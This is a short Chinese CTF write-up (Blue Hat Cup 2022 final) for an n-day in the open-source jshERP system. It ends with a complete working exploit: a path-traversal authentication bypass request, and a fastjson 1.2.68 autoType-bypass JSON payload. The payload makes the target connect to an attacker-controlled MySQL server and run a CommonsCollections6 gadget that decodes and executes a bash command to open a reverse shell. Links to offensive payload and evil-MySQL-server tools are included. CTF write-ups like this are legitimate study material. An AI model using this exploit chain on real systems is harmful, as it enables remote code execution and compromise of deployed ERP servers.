蓝帽杯2022决赛 - 赌怪 writeup

开源项目的NDAY

https://github.com/jishenghua/jshERP

已经有非常详细的文章分析

https://www.cnblogs.com/bmjoker/p/14856437.html

但是文章在介绍fastjson RCE的地方确实有点问题

题目给的依赖是

<dependency>
	<groupId>com.alibaba</groupId>
	<artifactId>fastjson</artifactId>
	<version>1.2.55</version>
</dependency>

由于是awdp，大可以用二分法选择fastjson版本修复来确定是哪一个版本的漏洞（

几次尝试后基本确定是1.2.68的autoType绕过

而题目有jdbc依赖

<dependency>
	<groupId>mysql</groupId>
	<artifactId>mysql-connector-java</artifactId>
	<version>5.1.30
	</version>
</dependency>

用该仓库的payload可以打jdbc反序列化，然后题目有commonscollections依赖，cc6链反弹shell

https://github.com/safe6Sec/Fastjson

以及mysql服务器

https://github.com/dushixiang/evil-mysql-server/

最终exp

GET /register.html/../user/list?search=xxxx HTTP/1.1
Host: 39.105.99.40:28592
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en,zh-TW;q=0.9,zh;q=0.8,en-US;q=0.7
Cookie: JSESSIONID=7C6C92CE236FFAEE4E7FC06FF8EAF933
If-Modified-Since: Fri, 29 Jul 2022 07:23:14 GMT
Connection: close

xxx是url编码过的json

{
    "@type": "java.lang.AutoCloseable",
    "@type": "com.mysql.jdbc.JDBC4Connection",
    "hostToConnectTo": "vpsip",
    "portToConnectTo": 3306,
    "info": {
        "user": "yso_CommonsCollections6_bash -c {echo,xxxxx}|{base64,-d}|{bash,-i}",
        "password": "pass",
        "statementInterceptors": "com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor",
        "autoDeserialize": "true",
        "NUM_HOSTS": "1"
    },
    "databaseToConnectTo": "dbname",
    "url": ""
}